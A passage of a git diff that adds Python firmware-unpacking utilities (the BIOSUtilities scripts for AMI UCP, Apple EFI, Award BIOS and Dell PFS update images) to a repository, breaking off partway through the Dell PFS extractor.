+UAF_MOD_LEN = ctypes.sizeof(UafModule) +DIS_HDR_LEN = ctypes.sizeof(DisHeader) +DIS_MOD_LEN = ctypes.sizeof(DisModule) +UII_HDR_LEN = ctypes.sizeof(UiiHeader) + +# AMI UCP Tag Dictionary +UAF_TAG_DICT = { + '@3FI' : ['HpBiosUpdate32.efi', 'HpBiosUpdate32.efi', ''], + '@3S2' : ['HpBiosUpdate32.s12', 'HpBiosUpdate32.s12', ''], + '@3S4' : ['HpBiosUpdate32.s14', 'HpBiosUpdate32.s14', ''], + '@3S9' : ['HpBiosUpdate32.s09', 'HpBiosUpdate32.s09', ''], + '@3SG' : ['HpBiosUpdate32.sig', 'HpBiosUpdate32.sig', ''], + '@AMI' : ['UCP_Nested.bin', 'Nested AMI UCP', ''], + '@B12' : ['BiosMgmt.s12', 'BiosMgmt.s12', ''], + '@B14' : ['BiosMgmt.s14', 'BiosMgmt.s14', ''], + '@B32' : ['BiosMgmt32.s12', 'BiosMgmt32.s12', ''], + '@B34' : ['BiosMgmt32.s14', 'BiosMgmt32.s14', ''], + '@B39' : ['BiosMgmt32.s09', 'BiosMgmt32.s09', ''], + '@B3E' : ['BiosMgmt32.efi', 'BiosMgmt32.efi', ''], + '@BM9' : ['BiosMgmt.s09', 'BiosMgmt.s09', ''], + '@BME' : ['BiosMgmt.efi', 'BiosMgmt.efi', ''], + '@CKV' : ['Check_Version.txt', 'Check Version', 'Text'], + '@CMD' : ['AFU_Command.txt', 'AMI AFU Command', 'Text'], + '@CML' : ['CMOSD4.txt', 'CMOS Item Number-Value (MSI)', 'Text'], + '@CMS' : ['CMOSD4.exe', 'Get or Set CMOS Item (MSI)', ''], + '@CPM' : ['AC_Message.txt', 'Confirm Power Message', ''], + '@DCT' : ['DevCon32.exe', 'Device Console WIN32', ''], + '@DCX' : ['DevCon64.exe', 'Device Console WIN64', ''], + '@DFE' : ['HpDevFwUpdate.efi', 'HpDevFwUpdate.efi', ''], + '@DFS' : ['HpDevFwUpdate.s12', 'HpDevFwUpdate.s12', ''], + '@DIS' : ['Command_Status.bin', 'Default Command Status', ''], + '@ENB' : ['ENBG64.exe', 'ENBG64.exe', ''], + '@HPU' : ['UCP_Main.bin', 'Utility Auxiliary File (HP)', ''], + '@INS' : ['Insyde_Nested.bin', 'Nested Insyde SFX', ''], + '@M32' : ['HpBiosMgmt32.s12', 'HpBiosMgmt32.s12', ''], + '@M34' : ['HpBiosMgmt32.s14', 'HpBiosMgmt32.s14', ''], + '@M39' : ['HpBiosMgmt32.s09', 'HpBiosMgmt32.s09', ''], + '@M3I' : ['HpBiosMgmt32.efi', 'HpBiosMgmt32.efi', ''], + '@MEC' : ['FWUpdLcl.txt', 'Intel FWUpdLcl Command', 'Text'], + '@MED' : ['FWUpdLcl_DOS.exe', 'Intel FWUpdLcl DOS', ''], + '@MET' : ['FWUpdLcl_WIN32.exe', 'Intel FWUpdLcl WIN32', ''], + '@MFI' : ['HpBiosMgmt.efi', 'HpBiosMgmt.efi', ''], + '@MS2' : ['HpBiosMgmt.s12', 'HpBiosMgmt.s12', ''], + '@MS4' : ['HpBiosMgmt.s14', 'HpBiosMgmt.s14', ''], + '@MS9' : ['HpBiosMgmt.s09', 'HpBiosMgmt.s09', ''], + '@NAL' : ['UCP_List.txt', 'AMI UCP Module Name List', ''], + '@OKM' : ['OK_Message.txt', 'OK Message', ''], + '@PFC' : ['BGT_Command.txt', 'AMI BGT Command', 'Text'], + '@R3I' : ['CryptRSA32.efi', 'CryptRSA32.efi', ''], + '@RFI' : ['CryptRSA.efi', 'CryptRSA.efi', ''], + '@UAF' : ['UCP_Main.bin', 'Utility Auxiliary File (AMI)', ''], + '@UFI' : ['HpBiosUpdate.efi', 'HpBiosUpdate.efi', ''], + '@UII' : ['UCP_Info.txt', 'Utility Identification Information', ''], + '@US2' : ['HpBiosUpdate.s12', 'HpBiosUpdate.s12', ''], + '@US4' : ['HpBiosUpdate.s14', 'HpBiosUpdate.s14', ''], + '@US9' : ['HpBiosUpdate.s09', 'HpBiosUpdate.s09', ''], + '@USG' : ['HpBiosUpdate.sig', 'HpBiosUpdate.sig', ''], + '@VER' : ['OEM_Version.txt', 'OEM Version', 'Text'], + '@VXD' : ['amifldrv.vxd', 'amifldrv.vxd', ''], + '@W32' : ['amifldrv32.sys', 'amifldrv32.sys', ''], + '@W64' : ['amifldrv64.sys', 'amifldrv64.sys', ''], + } + +if __name__ == '__main__': + utility = BIOSUtility(TITLE, is_ami_ucp, ucp_extract) + utility.parse_argument('-c', '--checksum', help='verify AMI UCP Checksums (slow)', action='store_true') + utility.run_utility() diff --git a/blobs/t480/biosutilities/Apple_EFI_ID.py b/blobs/t480/biosutilities/Apple_EFI_ID.py new file mode 100644 index 00000000..1003b676 --- /dev/null +++ b/blobs/t480/biosutilities/Apple_EFI_ID.py @@ -0,0 +1,167 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Apple EFI ID +Apple EFI Image Identifier +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Apple EFI Image Identifier v2.0_a5' + +import os +import sys +import zlib +import struct +import ctypes +import subprocess + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.externals import get_uefifind_path, get_uefiextract_path +from common.path_ops import del_dirs, path_parent, path_suffixes +from common.patterns import PAT_APPLE_EFI +from common.struct_ops import char, get_struct, uint8_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +class IntelBiosId(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Signature', char*8), # 0x00 + ('BoardID', uint8_t*16), # 0x08 + ('Dot1', uint8_t*2), # 0x18 + ('BoardExt', uint8_t*6), # 0x1A + ('Dot2', uint8_t*2), # 0x20 + ('VersionMajor', uint8_t*8), # 0x22 + ('Dot3', uint8_t*2), # 0x2A + ('BuildType', uint8_t*2), # 0x2C + ('VersionMinor', uint8_t*4), # 0x2E + ('Dot4', uint8_t*2), # 0x32 + ('Year', uint8_t*4), # 0x34 + ('Month', uint8_t*4), # 0x38 + ('Day', uint8_t*4), # 0x3C + ('Hour', uint8_t*4), # 0x40 + ('Minute', uint8_t*4), # 0x44 + ('NullTerminator', uint8_t*2), # 0x48 + # 0x4A + ] + + # https://github.com/tianocore/edk2-platforms/blob/master/Platform/Intel/BoardModulePkg/Include/Guid/BiosId.h + + @staticmethod + def decode(field): + return struct.pack('B' * len(field), *field).decode('utf-16','ignore').strip('\x00 ') + + def get_bios_id(self): + BoardID = self.decode(self.BoardID) + BoardExt = self.decode(self.BoardExt) + VersionMajor = self.decode(self.VersionMajor) + BuildType = self.decode(self.BuildType) + VersionMinor = self.decode(self.VersionMinor) + BuildDate = f'20{self.decode(self.Year)}-{self.decode(self.Month)}-{self.decode(self.Day)}' + BuildTime = f'{self.decode(self.Hour)}-{self.decode(self.Minute)}' + + return BoardID, BoardExt, VersionMajor, BuildType, VersionMinor, BuildDate, BuildTime + + def struct_print(self, p): + BoardID,BoardExt,VersionMajor,BuildType,VersionMinor,BuildDate,BuildTime = self.get_bios_id() + + printer(['Intel Signature:', self.Signature.decode('utf-8')], p, False) + printer(['Board Identity: ', BoardID], p, False) + printer(['Apple Identity: ', BoardExt], p, False) + printer(['Major Version: ', VersionMajor], p, False) + printer(['Minor Version: ', VersionMinor], p, False) + printer(['Build Type: ', BuildType], p, False) + printer(['Build Date: ', BuildDate], p, False) + printer(['Build Time: ', BuildTime.replace('-',':')], p, False) + +# Check if input is Apple EFI image +def is_apple_efi(input_file): + input_buffer = file_to_bytes(input_file) + + if PAT_APPLE_EFI.search(input_buffer): + return True + + if not os.path.isfile(input_file): + return False + + try: + _ = subprocess.run([get_uefifind_path(), input_file, 'body', 'list', PAT_UEFIFIND], + check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) + + return True + except Exception: + return False + +# Parse & Identify (or Rename) Apple EFI image +def apple_efi_identify(input_file, extract_path, padding=0, rename=False): + if not os.path.isfile(input_file): + printer('Error: Could not find input file path!', padding) + + return 1 + + input_buffer = file_to_bytes(input_file) + + bios_id_match = PAT_APPLE_EFI.search(input_buffer) # Detect $IBIOSI$ pattern + + if bios_id_match: + bios_id_res = f'0x{bios_id_match.start():X}' + + bios_id_hdr = get_struct(input_buffer, bios_id_match.start(), IntelBiosId) + else: + # The $IBIOSI$ pattern is within EFI compressed modules so we need to use UEFIFind and UEFIExtract + try: + bios_id_res = subprocess.check_output([get_uefifind_path(), input_file, 'body', 'list', PAT_UEFIFIND], + text=True)[:36] + + del_dirs(extract_path) # UEFIExtract must create its output folder itself, make sure it is not present + + _ = subprocess.run([get_uefiextract_path(), input_file, bios_id_res, '-o', extract_path, '-m', 'body'], + check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) + + with open(os.path.join(extract_path, 'body.bin'), 'rb') as raw_body: + body_buffer = raw_body.read() + + bios_id_match = PAT_APPLE_EFI.search(body_buffer) # Detect decompressed $IBIOSI$ pattern + + bios_id_hdr = get_struct(body_buffer, bios_id_match.start(), IntelBiosId) + + del_dirs(extract_path) # Successful UEFIExtract extraction, remove its output (temp) folder + except Exception: + printer('Error: Failed to parse compressed $IBIOSI$ pattern!', padding) + + return 2 + + printer(f'Detected $IBIOSI$ at {bios_id_res}\n', padding) + + bios_id_hdr.struct_print(padding + 4) + + if rename: + input_parent = path_parent(input_file) + + input_suffix = path_suffixes(input_file)[-1] + + input_adler32 = zlib.adler32(input_buffer) + + ID,Ext,Major,Type,Minor,Date,Time = bios_id_hdr.get_bios_id() + + output_name = f'{ID}_{Ext}_{Major}_{Type}{Minor}_{Date}_{Time}_{input_adler32:08X}{input_suffix}' + + output_file = os.path.join(input_parent, output_name) + + if not os.path.isfile(output_file): + os.replace(input_file, output_file) # Rename input file based on its EFI tag + + printer(f'Renamed to {output_name}', padding) + + return 0 + +PAT_UEFIFIND = f'244942494F534924{"."*32}2E00{"."*12}2E00{"."*16}2E00{"."*12}2E00{"."*40}0000' + +if __name__ == '__main__': + utility = BIOSUtility(TITLE, is_apple_efi, apple_efi_identify) + utility.parse_argument('-r', '--rename', help='rename EFI image based on its tag', action='store_true') + utility.run_utility() diff --git a/blobs/t480/biosutilities/Apple_EFI_IM4P.py b/blobs/t480/biosutilities/Apple_EFI_IM4P.py new file mode 100644 index 00000000..5dceefa3 --- /dev/null +++ b/blobs/t480/biosutilities/Apple_EFI_IM4P.py @@ -0,0 +1,145 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Apple EFI IM4P +Apple EFI IM4P Splitter +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Apple EFI IM4P Splitter v3.0_a5' + +import os +import sys + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.path_ops import make_dirs, path_stem +from common.patterns import PAT_APPLE_IM4P, PAT_INTEL_IFD +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +# Check if input is Apple EFI IM4P image +def is_apple_im4p(input_file): + input_buffer = file_to_bytes(input_file) + + is_im4p = PAT_APPLE_IM4P.search(input_buffer) + + is_ifd = PAT_INTEL_IFD.search(input_buffer) + + return bool(is_im4p and is_ifd) + +# Parse & Split Apple EFI IM4P image +def apple_im4p_split(input_file, extract_path, padding=0): + exit_codes = [] + + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + # Detect IM4P EFI pattern + im4p_match = PAT_APPLE_IM4P.search(input_buffer) + + # After IM4P mefi (0x15), multi EFI payloads have _MEFIBIN (0x100) but is difficult to RE w/o varying samples. + # However, _MEFIBIN is not required for splitting SPI images due to Intel Flash Descriptor Components Density. + + # IM4P mefi payload start offset + mefi_data_bgn = im4p_match.start() + input_buffer[im4p_match.start() - 0x1] + + # IM4P mefi payload size + mefi_data_len = int.from_bytes(input_buffer[im4p_match.end() + 0x5:im4p_match.end() + 0x9], 'big') + + # Check if mefi is followed by _MEFIBIN + mefibin_exist = input_buffer[mefi_data_bgn:mefi_data_bgn + 0x8] == b'_MEFIBIN' + + # Actual multi EFI payloads start after _MEFIBIN + efi_data_bgn = mefi_data_bgn + 0x100 if mefibin_exist else mefi_data_bgn + + # Actual multi EFI payloads size without _MEFIBIN + efi_data_len = mefi_data_len - 0x100 if mefibin_exist else mefi_data_len + + # Adjust input file buffer to actual multi EFI payloads data + input_buffer = input_buffer[efi_data_bgn:efi_data_bgn + efi_data_len] + + # Parse Intel Flash Descriptor pattern matches + for ifd in PAT_INTEL_IFD.finditer(input_buffer): + # Component Base Address from FD start (ICH8-ICH10 = 1, IBX = 2, CPT+ = 3) + ifd_flmap0_fcba = input_buffer[ifd.start() + 0x4] * 0x10 + + # I/O Controller Hub (ICH) + if ifd_flmap0_fcba == 0x10: + # At ICH, Flash Descriptor starts at 0x0 + ifd_bgn_substruct = 0x0 + + # 0xBC for [0xAC] + 0xFF * 16 sanity check + ifd_end_substruct = 0xBC + + # Platform Controller Hub (PCH) + else: + # At PCH, Flash Descriptor starts at 0x10 + ifd_bgn_substruct = 0x10 + + # 0xBC for [0xAC] + 0xFF * 16 sanity check + ifd_end_substruct = 0xBC + + # Actual Flash Descriptor Start Offset + ifd_match_start = ifd.start() - ifd_bgn_substruct + + # Actual Flash Descriptor End Offset + ifd_match_end = ifd.end() - ifd_end_substruct + + # Calculate Intel Flash Descriptor Flash Component Total Size + + # Component Count (00 = 1, 01 = 2) + ifd_flmap0_nc = ((int.from_bytes(input_buffer[ifd_match_end:ifd_match_end + 0x4], 'little') >> 8) & 3) + 1 + + # PCH/ICH Strap Length (ME 2-8 & TXE 0-2 & SPS 1-2 <= 0x12, ME 9+ & TXE 3+ & SPS 3+ >= 0x13) + ifd_flmap1_isl = input_buffer[ifd_match_end + 0x7] + + # Component Density Byte (ME 2-8 & TXE 0-2 & SPS 1-2 = 0:5, ME 9+ & TXE 3+ & SPS 3+ = 0:7) + ifd_comp_den = input_buffer[ifd_match_start + ifd_flmap0_fcba] + + # Component 1 Density Bits (ME 2-8 & TXE 0-2 & SPS 1-2 = 3, ME 9+ & TXE 3+ & SPS 3+ = 4) + ifd_comp_1_bitwise = 0xF if ifd_flmap1_isl >= 0x13 else 0x7 + + # Component 2 Density Bits (ME 2-8 & TXE 0-2 & SPS 1-2 = 3, ME 9+ & TXE 3+ & SPS 3+ = 4) + ifd_comp_2_bitwise = 0x4 if ifd_flmap1_isl >= 0x13 else 0x3 + + # Component 1 Density (FCBA > C0DEN) + ifd_comp_all_size = IFD_COMP_LEN[ifd_comp_den & ifd_comp_1_bitwise] + + # Component 2 Density (FCBA > C1DEN) + if ifd_flmap0_nc == 2: + ifd_comp_all_size += IFD_COMP_LEN[ifd_comp_den >> ifd_comp_2_bitwise] + + ifd_data_bgn = ifd_match_start + ifd_data_end = ifd_data_bgn + ifd_comp_all_size + ifd_data_txt = f'0x{ifd_data_bgn:07X}-0x{ifd_data_end:07X}' + + output_data = input_buffer[ifd_data_bgn:ifd_data_end] + + output_size = len(output_data) + + output_name = path_stem(input_file) if os.path.isfile(input_file) else 'Part' + + output_path = os.path.join(extract_path, f'{output_name}_[{ifd_data_txt}].fd') + + with open(output_path, 'wb') as output_image: + output_image.write(output_data) + + printer(f'Split Apple EFI image at {ifd_data_txt}!', padding) + + if output_size != ifd_comp_all_size: + printer(f'Error: Bad image size 0x{output_size:07X}, expected 0x{ifd_comp_all_size:07X}!', padding + 4) + + exit_codes.append(1) + + return sum(exit_codes) + +# Intel Flash Descriptor Component Sizes (4MB, 8MB, 16MB and 32MB) +IFD_COMP_LEN = {3: 0x400000, 4: 0x800000, 5: 0x1000000, 6: 0x2000000} + +if __name__ == '__main__': + BIOSUtility(TITLE, is_apple_im4p, apple_im4p_split).run_utility() diff --git a/blobs/t480/biosutilities/Apple_EFI_PBZX.py b/blobs/t480/biosutilities/Apple_EFI_PBZX.py new file mode 100644 index 00000000..8e4f5536 --- /dev/null +++ b/blobs/t480/biosutilities/Apple_EFI_PBZX.py @@ -0,0 +1,118 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Apple PBZX Extract +Apple EFI PBZX Extractor +Copyright (C) 2021-2022 Plato Mavropoulos +""" + +TITLE = 'Apple EFI PBZX Extractor v1.0_a5' + +import os +import sys +import lzma +import ctypes + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_szip import is_szip_supported, szip_decompress +from common.path_ops import make_dirs, path_stem +from common.patterns import PAT_APPLE_PBZX +from common.struct_ops import get_struct, uint32_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +class PbzxChunk(ctypes.BigEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Reserved0', uint32_t), # 0x00 + ('InitSize', uint32_t), # 0x04 + ('Reserved1', uint32_t), # 0x08 + ('CompSize', uint32_t), # 0x0C + # 0x10 + ] + + def struct_print(self, p): + printer(['Reserved 0 :', f'0x{self.Reserved0:X}'], p, False) + printer(['Initial Size :', f'0x{self.InitSize:X}'], p, False) + printer(['Reserved 1 :', f'0x{self.Reserved1:X}'], p, False) + printer(['Compressed Size:', f'0x{self.CompSize:X}'], p, False) + +# Check if input is Apple PBZX image +def is_apple_pbzx(input_file): + input_buffer = file_to_bytes(input_file) + + return bool(PAT_APPLE_PBZX.search(input_buffer[:0x4])) + +# Parse & Extract Apple PBZX image +def apple_pbzx_extract(input_file, extract_path, padding=0): + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + cpio_bin = b'' # Initialize PBZX > CPIO Buffer + cpio_len = 0x0 # Initialize PBZX > CPIO Length + + chunk_off = 0xC # First PBZX Chunk starts at 0xC + while chunk_off < len(input_buffer): + chunk_hdr = get_struct(input_buffer, chunk_off, PbzxChunk) + + printer(f'PBZX Chunk at 0x{chunk_off:08X}\n', padding) + + chunk_hdr.struct_print(padding + 4) + + # PBZX Chunk data starts after its Header + comp_bgn = chunk_off + PBZX_CHUNK_HDR_LEN + + # To avoid a potential infinite loop, double-check Compressed Size + comp_end = comp_bgn + max(chunk_hdr.CompSize, PBZX_CHUNK_HDR_LEN) + + comp_bin = input_buffer[comp_bgn:comp_end] + + try: + # Attempt XZ decompression, if applicable to Chunk data + cpio_bin += lzma.LZMADecompressor().decompress(comp_bin) + + printer('Successful LZMA decompression!', padding + 8) + except Exception: + # Otherwise, Chunk data is not compressed + cpio_bin += comp_bin + + # Final CPIO size should match the sum of all Chunks > Initial Size + cpio_len += chunk_hdr.InitSize + + # Next Chunk starts at the end of current Chunk's data + chunk_off = comp_end + + # Check that CPIO size is valid based on all Chunks > Initial Size + if cpio_len != len(cpio_bin): + printer('Error: Unexpected CPIO archive size!', padding) + + return 1 + + cpio_name = path_stem(input_file) if os.path.isfile(input_file) else 'Payload' + + cpio_path = os.path.join(extract_path, f'{cpio_name}.cpio') + + with open(cpio_path, 'wb') as cpio_object: + cpio_object.write(cpio_bin) + + # Decompress PBZX > CPIO archive with 7-Zip + if is_szip_supported(cpio_path, padding, args=['-tCPIO'], check=True): + if szip_decompress(cpio_path, extract_path, 'CPIO', padding, args=['-tCPIO'], check=True) == 0: + os.remove(cpio_path) # Successful extraction, delete PBZX > CPIO archive + else: + return 3 + else: + return 2 + + return 0 + +# Get common ctypes Structure Sizes +PBZX_CHUNK_HDR_LEN = ctypes.sizeof(PbzxChunk) + +if __name__ == '__main__': + BIOSUtility(TITLE, is_apple_pbzx, apple_pbzx_extract).run_utility() diff --git a/blobs/t480/biosutilities/Apple_EFI_PKG.py b/blobs/t480/biosutilities/Apple_EFI_PKG.py new file mode 100644 index 00000000..a185547d --- /dev/null +++ b/blobs/t480/biosutilities/Apple_EFI_PKG.py @@ -0,0 +1,148 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Apple EFI PKG +Apple EFI Package Extractor +Copyright (C) 2019-2022 Plato Mavropoulos +""" + +TITLE = 'Apple EFI Package Extractor v2.0_a5' + +import os +import sys + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_szip import is_szip_supported, szip_decompress +from common.path_ops import copy_file, del_dirs, get_path_files, make_dirs, path_name, path_parent, get_extract_path +from common.patterns import PAT_APPLE_PKG +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +from Apple_EFI_ID import apple_efi_identify, is_apple_efi +from Apple_EFI_IM4P import apple_im4p_split, is_apple_im4p +from Apple_EFI_PBZX import apple_pbzx_extract, is_apple_pbzx + +# Check if input is Apple EFI PKG package +def is_apple_pkg(input_file): + input_buffer = file_to_bytes(input_file) + + return bool(PAT_APPLE_PKG.search(input_buffer[:0x4])) + +# Split Apple EFI image (if applicable) and Rename +def efi_split_rename(in_file, out_path, padding=0): + exit_codes = [] + + working_dir = get_extract_path(in_file) + + if is_apple_im4p(in_file): + printer(f'Splitting IM4P via {is_apple_im4p.__module__}...', padding) + im4p_exit = apple_im4p_split(in_file, working_dir, padding + 4) + exit_codes.append(im4p_exit) + else: + make_dirs(working_dir, delete=True) + copy_file(in_file, working_dir, True) + + for efi_file in get_path_files(working_dir): + if is_apple_efi(efi_file): + printer(f'Renaming EFI via {is_apple_efi.__module__}...', padding) + name_exit = apple_efi_identify(efi_file, efi_file, padding + 4, True) + exit_codes.append(name_exit) + + for named_file in get_path_files(working_dir): + copy_file(named_file, out_path, True) + + del_dirs(working_dir) + + return sum(exit_codes) + +# Parse & Extract Apple EFI PKG packages +def apple_pkg_extract(input_file, extract_path, padding=0): + if not os.path.isfile(input_file): + printer('Error: Could not find input file path!', padding) + return 1 + + make_dirs(extract_path, delete=True) + + xar_path = os.path.join(extract_path, 'xar') + + # Decompress PKG > XAR archive with 7-Zip + if is_szip_supported(input_file, padding, args=['-tXAR'], check=True): + if szip_decompress(input_file, xar_path, 'XAR', padding, args=['-tXAR'], check=True) != 0: + return 3 + else: + return 2 + + for xar_file in get_path_files(xar_path): + if path_name(xar_file) == 'Payload': + pbzx_module = is_apple_pbzx.__module__ + if is_apple_pbzx(xar_file): + printer(f'Extracting PBZX via {pbzx_module}...', padding + 4) + pbzx_path = get_extract_path(xar_file) + if apple_pbzx_extract(xar_file, pbzx_path, padding + 8) == 0: + printer(f'Succesfull PBZX extraction via {pbzx_module}!', padding + 4) + for pbzx_file in get_path_files(pbzx_path): + if path_name(pbzx_file) == 'UpdateBundle.zip': + if is_szip_supported(pbzx_file, padding + 8, args=['-tZIP'], check=True): + zip_path = get_extract_path(pbzx_file) + if szip_decompress(pbzx_file, zip_path, 'ZIP', padding + 8, args=['-tZIP'], check=True) == 0: + for zip_file in get_path_files(zip_path): + if path_name(path_parent(zip_file)) == 'MacEFI': + printer(path_name(zip_file), padding + 12) + if efi_split_rename(zip_file, extract_path, padding + 16) != 0: + printer(f'Error: Could not split and rename {path_name(zip_file)}!', padding) + return 10 + else: + return 9 + else: + return 8 + break # ZIP found, stop + else: + printer('Error: Could not find "UpdateBundle.zip" file!', padding) + return 7 + else: + printer(f'Error: Failed to extract PBZX file via {pbzx_module}!', padding) + return 6 + else: + printer(f'Error: Failed to detect file as PBZX via {pbzx_module}!', padding) + return 5 + + break # Payload found, stop searching + + if path_name(xar_file) == 'Scripts': + if is_szip_supported(xar_file, padding + 4, args=['-tGZIP'], check=True): + gzip_path = get_extract_path(xar_file) + if szip_decompress(xar_file, gzip_path, 'GZIP', padding + 4, args=['-tGZIP'], check=True) == 0: + for gzip_file in get_path_files(gzip_path): + if is_szip_supported(gzip_file, padding + 8, args=['-tCPIO'], check=True): + cpio_path = get_extract_path(gzip_file) + if szip_decompress(gzip_file, cpio_path, 'CPIO', padding + 8, args=['-tCPIO'], check=True) == 0: + for cpio_file in get_path_files(cpio_path): + if path_name(path_parent(cpio_file)) == 'EFIPayloads': + printer(path_name(cpio_file), padding + 12) + if efi_split_rename(cpio_file, extract_path, padding + 16) != 0: + printer(f'Error: Could not split and rename {path_name(cpio_file)}!', padding) + return 15 + else: + return 14 + else: + return 13 + else: + return 12 + else: + return 11 + + break # Scripts found, stop searching + else: + printer('Error: Could not find "Payload" or "Scripts" file!', padding) + return 4 + + del_dirs(xar_path) # Delete temporary/working XAR folder + + return 0 + +if __name__ == '__main__': + BIOSUtility(TITLE, is_apple_pkg, apple_pkg_extract).run_utility() diff --git a/blobs/t480/biosutilities/Award_BIOS_Extract.py b/blobs/t480/biosutilities/Award_BIOS_Extract.py new file mode 100644 index 00000000..12d1e969 --- /dev/null +++ b/blobs/t480/biosutilities/Award_BIOS_Extract.py @@ -0,0 +1,74 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Award BIOS Extract +Award BIOS Module Extractor +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Award BIOS Module Extractor v2.0_a5' + +import os +import sys + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_szip import szip_decompress +from common.path_ops import make_dirs, safe_name, get_extract_path +from common.patterns import PAT_AWARD_LZH +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +# Check if input is Award BIOS image +def is_award_bios(in_file): + in_buffer = file_to_bytes(in_file) + + return bool(PAT_AWARD_LZH.search(in_buffer)) + +# Parse & Extract Award BIOS image +def award_bios_extract(input_file, extract_path, padding=0): + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + for lzh_match in PAT_AWARD_LZH.finditer(input_buffer): + lzh_type = lzh_match.group(0).decode('utf-8') + lzh_text = f'LZH-{lzh_type.strip("-").upper()}' + + lzh_bgn = lzh_match.start() + + mod_bgn = lzh_bgn - 0x2 + hdr_len = input_buffer[mod_bgn] + mod_len = int.from_bytes(input_buffer[mod_bgn + 0x7:mod_bgn + 0xB], 'little') + mod_end = lzh_bgn + hdr_len + mod_len + mod_bin = input_buffer[mod_bgn:mod_end] + + tag_bgn = mod_bgn + 0x16 + tag_end = tag_bgn + input_buffer[mod_bgn + 0x15] + tag_txt = input_buffer[tag_bgn:tag_end].decode('utf-8','ignore') + + printer(f'{lzh_text} > {tag_txt} [0x{mod_bgn:06X}-0x{mod_end:06X}]', padding) + + mod_path = os.path.join(extract_path, safe_name(tag_txt)) + lzh_path = f'{mod_path}.lzh' + + with open(lzh_path, 'wb') as lzh_file: + lzh_file.write(mod_bin) # Store LZH archive + + # 7-Zip returns critical exit code (i.e. 2) if LZH CRC is wrong, do not check result + szip_decompress(lzh_path, extract_path, lzh_text, padding + 4, check=False) + + # Manually check if 7-Zip extracted LZH due to its CRC check issue + if os.path.isfile(mod_path): + os.remove(lzh_path) # Successful extraction, delete LZH archive + + # Extract any nested LZH archives + if is_award_bios(mod_path): + # Recursively extract nested Award BIOS modules + award_bios_extract(mod_path, get_extract_path(mod_path), padding + 8) + +if __name__ == '__main__': + BIOSUtility(TITLE, is_award_bios, award_bios_extract).run_utility() diff --git a/blobs/t480/biosutilities/Dell_PFS_Extract.py b/blobs/t480/biosutilities/Dell_PFS_Extract.py new file mode 100644 index 00000000..b8cb6865 --- /dev/null +++ b/blobs/t480/biosutilities/Dell_PFS_Extract.py @@ -0,0 +1,1067 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Dell PFS Extract +Dell PFS Update Extractor +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Dell PFS Update Extractor v6.0_a16' + +import os +import io +import sys +import lzma +import zlib +import ctypes +import contextlib + +# Skip __pycache__ generation +sys.dont_write_bytecode = True + +from common.checksums import get_chk_8_xor +from common.comp_szip import is_szip_supported, szip_decompress +from common.num_ops import get_ordinal +from common.path_ops import del_dirs, get_path_files, make_dirs, path_name, path_parent, path_stem, safe_name +from common.patterns import PAT_DELL_FTR, PAT_DELL_HDR, PAT_DELL_PKG +from common.struct_ops import char, get_struct, uint8_t, uint16_t, uint32_t, uint64_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +from AMI_PFAT_Extract import IntelBiosGuardHeader, IntelBiosGuardSignature2k, parse_bg_script + +# Dell PFS Header Structure +class DellPfsHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Tag', char*8), # 0x00 + ('HeaderVersion', uint32_t), # 0x08 + ('PayloadSize', uint32_t), # 0x0C + # 0x10 + ] + + def struct_print(self, p): + printer(['Header Tag :', self.Tag.decode('utf-8')], p, False) + printer(['Header Version:', self.HeaderVersion], p, False) + printer(['Payload Size :', f'0x{self.PayloadSize:X}'], p, False) + +# Dell PFS Footer Structure +class DellPfsFooter(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('PayloadSize', uint32_t), # 0x00 + ('Checksum', uint32_t), # 0x04 ~CRC32 w/ Vector 0 + ('Tag', char*8), # 0x08 + # 0x10 + ] + + def struct_print(self, p): + printer(['Payload Size :', f'0x{self.PayloadSize:X}'], p, False) + printer(['Payload Checksum:', f'0x{self.Checksum:08X}'], p, False) + printer(['Footer Tag :', self.Tag.decode('utf-8')], p, False) + +# Dell PFS Entry Base Structure +class DellPfsEntryBase(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('GUID', uint32_t*4), # 0x00 Little Endian + ('HeaderVersion', uint32_t), # 0x10 1 or 2 + ('VersionType', uint8_t*4), # 0x14 + ('Version', uint16_t*4), # 0x18 + ('Reserved', uint64_t), # 0x20 + ('DataSize', uint32_t), # 0x28 + ('DataSigSize', uint32_t), # 0x2C + ('DataMetSize', uint32_t), # 0x30 + ('DataMetSigSize', uint32_t), # 0x34 + # 0x38 (parent class, base) + ] + + def struct_print(self, p): + GUID = f'{int.from_bytes(self.GUID, "little"):0{0x10 * 2}X}' + Unknown = f'{int.from_bytes(self.Unknown, "little"):0{len(self.Unknown) * 8}X}' + Version = get_entry_ver(self.Version, self.VersionType) + + printer(['Entry GUID :', GUID], 